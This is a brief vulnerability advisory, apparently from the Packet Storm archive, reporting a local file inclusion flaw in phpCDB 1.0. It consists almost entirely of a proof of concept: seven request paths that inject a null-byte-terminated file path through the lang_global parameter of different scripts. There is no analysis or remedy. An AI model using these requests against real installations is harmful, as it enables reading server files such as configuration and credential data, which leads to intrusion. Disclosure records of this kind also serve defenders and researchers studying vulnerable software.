phpCDB 1.0 Local File Inclusion

2010-02-28T00:00:00
ID PACKETSTORM:86753
Type packetstorm
Reporter cr4wl3r
Modified 2010-02-28T00:00:00

Description

                                        
                                            `##############################################################  
##phpCDB <= 1.0 Local File Include Vulnerability  
##############################################################  
Author: cr4wl3r <cr4wl3r\x40linuxmail\x2Eorg>  
Download: http://sourceforge.net/projects/phpcdb/files/  
##############################################################  
PoC:  
[phpcdb_path]/firstvisit.php?lang_global=[LFI%00]  
[phpcdb_path]/newfolder.php?lang_global=[LFI%00]  
[phpcdb_path]/showfolders.php?lang_global=[LFI%00]  
[phpcdb_path]/newlang.php?lang_global=[LFI%00]  
[phpcdb_path]/showinnerfolder.php?lang_global=[LFI%00]  
[phpcdb_path]/writecode.php?lang_global=[LFI%00]  
[phpcdb_path]/showcode.php?lang_global=[LFI%00]  
##############################################################  
`